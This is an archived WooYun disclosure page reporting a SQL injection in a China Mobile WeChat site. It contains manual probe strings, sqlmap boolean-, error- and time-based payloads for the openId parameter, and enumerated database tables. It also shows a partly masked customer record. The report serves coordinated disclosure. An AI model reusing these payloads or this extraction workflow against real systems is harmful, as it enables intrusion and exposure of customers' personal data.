当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167259

漏洞标题:中国移动某站存在SQL注入漏洞,泄露大量客户信息

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2016-01-04 19:20

修复时间:2016-02-22 17:50

公开时间:2016-02-22 17:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-04: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

详细说明:

Snap160.jpg


号码登记

Snap161.jpg


浏览器打开
点我要推荐

Snap162.jpg


http://**.**.**.**/hkwx/suggestionPersonController.do?goRandomPage&openId=*********


输入'

Snap163.jpg


输入'and'1'='1

Snap164.jpg


输入'and'1'='2

Snap165.jpg


漏洞证明:

注入点

http://**.**.**.**/hkwx/suggestionPersonController.do?goRandomPage&openId=**********


sqlmap identified the following injection points with a total of 246 HTTP(s) requests:
---
Place: GET
Parameter: openId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: goRandomPage&openId=oV*************' AND 7886=7886 AND 'mXXN'='mXXN
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: goRandomPage&openId=oV*************' AND (SELECT 6649 FROM(SELECT COUNT(*),CONCAT(0x716b696471,(SELECT (CASE WHEN (6649=6649) THEN 1 ELSE 0 END)),0x7163737871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zrCN'='zrCN
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: goRandomPage&openId=oV*************' AND SLEEP(5) AND 'fOLT'='fOLT
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0


数据库

available databases [5]:
[*] hkwx
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


current database:    'hkwx'


Database: hkwx
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| weixin_mbmobile_detail       | 1055712 |
| suggestionperson             | 1005631 |
| menuclick201506              | 854342  |
| wy_mbkh_data                 | 845483  |
| menuclick201412              | 788829  |
| menuclick201509              | 693634  |
| menuclick201505              | 652051  |
| menuclick201411              | 619970  |
| userinfo                     | 619458  |
| gzuserinfo                   | 592817  |
| weixin_motheractivity_record | 581052  |
| menuclick201508              | 573609  |
| menuclick201410              | 556975  |
| menuclick201510              | 554747  |
| menuclick201501              | 538485  |
| menuclick201507              | 469292  |
| menuclick201503              | 460616  |
| receivetext                  | 434467  |
| weixin_user_school           | 395047  |
| menuclick201511              | 385406  |
| menuclick201504              | 384474  |
| menuclick201502              | 383457  |
| menuclick201512              | 378417  |
| weixin_qxperson              | 264192  |
| weixin_aim_mobile            | 142930  |
| regist                       | 124220  |
| menuclick201601              | 111508  |
| weixin_business_record       | 95157   |
| menuclick201409              | 90158   |
| prizerecord                  | 84053   |
| weixin_motheractivity        | 78452   |
| weixin_gzyh_gprs             | 40716   |
| weixin_task_mobile           | 35676   |
| t_s_log                      | 34381   |
| weixin_business_total        | 16170   |
| hduserinfo                   | 10090   |
| weixin_setword_total         | 6946    |
| weixin_setword_record        | 6791    |
| menuclick_total              | 6397    |
| menuclick201408              | 6118    |
| hdrecord                     | 5540    |
| regist_total                 | 4250    |
| weixin_signin                | 4076    |
| weixin_qian_dao              | 3145    |
| weixin_kuandai_college       | 2634    |
| weixin_mobile_vote_record    | 1740    |
| sharerecord                  | 1685    |
| weixin_target_mobile         | 882     |
| weixin_fwzx_user             | 783     |
| test                         | 658     |
| gzuserinfo_total             | 538     |
| t_s_attachment               | 500     |
| userinfo_total               | 495     |
| t_s_document                 | 487     |
| weixin_jt_manager            | 374     |
| integration                  | 349     |
| t_s_online                   | 334     |
| weixin_scyw_activityorder    | 330     |
| weixin_year_metting          | 247     |
| weixin_tj_activityuser       | 236     |
| weixin_recommend_card        | 174     |
| t_s_role_function            | 144     |
| weixin_sc_taocan_yuy         | 141     |
| weixin_tj_activityrecord     | 136     |
| t_s_function                 | 123     |
| newsitem                     | 113     |
.....


select * from userinfo limit 100,1; [7]:
[*]  
[*]  15093*****61
[*] 0
[*] 2014-10-06 22:04:25
[*] 2c8f81884b002435014b110d882d12be
[*] gh_065a64f56fc7
[*] oVxGUjg-8Bc****DX8Q28A


weixin_user_school
可以根据手机号查学校了

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-08 18:19

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无

漏洞评价:

评价